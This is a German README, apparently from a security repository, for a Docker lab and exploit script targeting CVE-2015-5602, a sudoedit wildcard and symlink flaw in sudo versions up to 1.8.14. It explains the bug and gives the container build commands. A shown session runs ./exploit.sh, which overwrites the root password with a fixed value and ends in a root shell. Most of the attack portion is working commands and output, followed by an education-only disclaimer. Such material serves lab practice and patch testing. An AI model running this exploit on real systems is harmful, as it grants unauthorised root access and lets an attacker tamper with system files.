
Sudo <= 1.8.14 Lokale Rechteausweitung und verwundbarer Container
Sudo (su „do") ermöglicht einem Systemadministrator, bestimmten Benutzern (oder Benutzergruppen) die Möglichkeit zu geben, einige (oder alle) Befehle als root auszuführen, während alle Befehle und Argumente protokolliert werden.
Um eine verwundbare Umgebung für Ihren Test einzurichten, benötigen Sie Docker installiert und führen einfach den folgenden Befehl aus:
docker build -t privesc/cve-2015-5602 .
docker run --rm -it privesc/cve-2015-5602
Und es wird eine interaktive Shell mit niedrigen Benutzerrechten gestartet.
Der Fehler wurde in sudoedit gefunden, das den vollständigen Pfad nicht überprüft, wenn ein Platzhalter zweimal verwendet wird (z. B. /home/*/*/esc.txt). Dies ermöglicht einem böswilligen Benutzer, die eigentliche Datei esc.txt durch einen symbolischen Link auf einen anderen Speicherort (z. B. /etc/shadow) zu ersetzen.
Ein erfolgreicher Exploit dieses Problems kann es einem Angreifer ermöglichen, Dateien zu manipulieren und durch Symlink-Angriffe Root-Rechte auf dem Hostsystem zu erlangen.
Um dieses Ziel auszunutzen, führen Sie einfach Folgendes aus:
./exploit.sh
Wenn Sie dieses verwundbare Image verwenden, können Sie einfach Folgendes ausführen:
user@1cc9cd901b07:~$ sudo -l
User user may run the following commands on 1cc9cd901b07:
(root) NOPASSWD: sudoedit /home/*/*/esc.txt
user@1cc9cd901b07:~$ ./exploit.sh
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: d03c09dc34c53657aff1f459a86b20ed
[+] Done
user@1cc9cd901b07:~$ su
Password:
root@1cc9cd901b07:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@1cc9cd901b07:/home/user#
Diese Schwachstelle wurde von Daniel Svartman entdeckt.
Dieses oder frühere Programm dient NUR zu Bildungszwecken. Verwenden Sie es nicht ohne Erlaubnis. Der übliche Haftungsausschluss gilt, insbesondere die Tatsache, dass ich (t0kx) nicht für Schäden haftbar bin, die durch direkte oder indirekte Nutzung der von diesen Programmen bereitgestellten Informationen oder Funktionen verursacht werden. Der Autor oder irgendein Internetanbieter übernimmt KEINE Verantwortung für den Inhalt oder die missbräuchliche Verwendung dieser Programme oder deren Abkömmlinge. Durch die Nutzung dieser Programme akzeptieren Sie die Tatsache, dass jegliche Schäden (Datenverlust, Systemabsturz, Systemkompromittierung usw.), die durch die Nutzung dieser Programme verursacht werden, nicht in der Verantwortung von t0kx liegen.